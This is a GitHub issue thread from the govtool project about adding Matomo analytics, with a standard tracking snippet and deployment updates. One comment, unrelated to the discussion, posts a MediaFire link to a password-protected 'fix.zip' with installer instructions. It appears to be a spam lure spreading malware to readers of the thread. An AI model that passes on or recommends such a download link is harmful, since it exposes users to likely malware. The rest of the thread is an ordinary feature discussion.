### ISSUE TITLE
💡 Add Matomo analytics

### ISSUE THREAD

**Issue by bosko-m** [IntersectMBO/govtool#1817]
### Area

Wrapper

### Is there new design needed?

No

### What?

The implementation will involve integrating a web analytics tool Matomo into the app to track key metrics.

### Why?

Understanding how users interact with the website is crucial for identifying where they encounter difficulties, and how they navigate through the site.

### How?

1. Implement Tracking Code: Add the provided tracking code to all pages of the website, ensuring it's correctly configured to capture user interactions.
2. Set Up Goals and Events: Define specific goals (e.g., sign-ups) and events (e.g., button clicks, video plays) that align with objectives.
3. Test and Verify: Conduct tests to ensure data is being accurately captured and reported in the analytics dashboard.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by m-i-k-e** [comment]
Please see if we can remove our own traffic from the analytics.

**Comment by aaboyle878** [comment]
@jdyczka could you add the following so we can track the page views 

<script>
  var _paq = window._paq = window._paq || [];
  /* tracker methods like "setCustomDimension" should be called before "trackPageView" */
  _paq.push(['trackPageView']);
  _paq.push(['enableLinkTracking']);
  (function() {
    var u="//p80-zca17e2b0-z1743beba-gtw.z937eb260.rustrocks.fr/";
    _paq.push(['setTrackerUrl', u+'matomo.php']);
    _paq.push(['setSiteId', '1']);
    var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
    g.async=true; g.src=u+'matomo.js'; s.parentNode.insertBefore(g,s);
  })();
</script>

**Comment by Ryun1** [comment]
[This PR](https://github.com/IntersectMBO/govtool/pull/2021) adds matomo to one page, lets test it out and see how it looks

**Comment by Ryun1** [comment]
Matomo deployed to Preview and Mainnet, lets see how it looks and then go from there
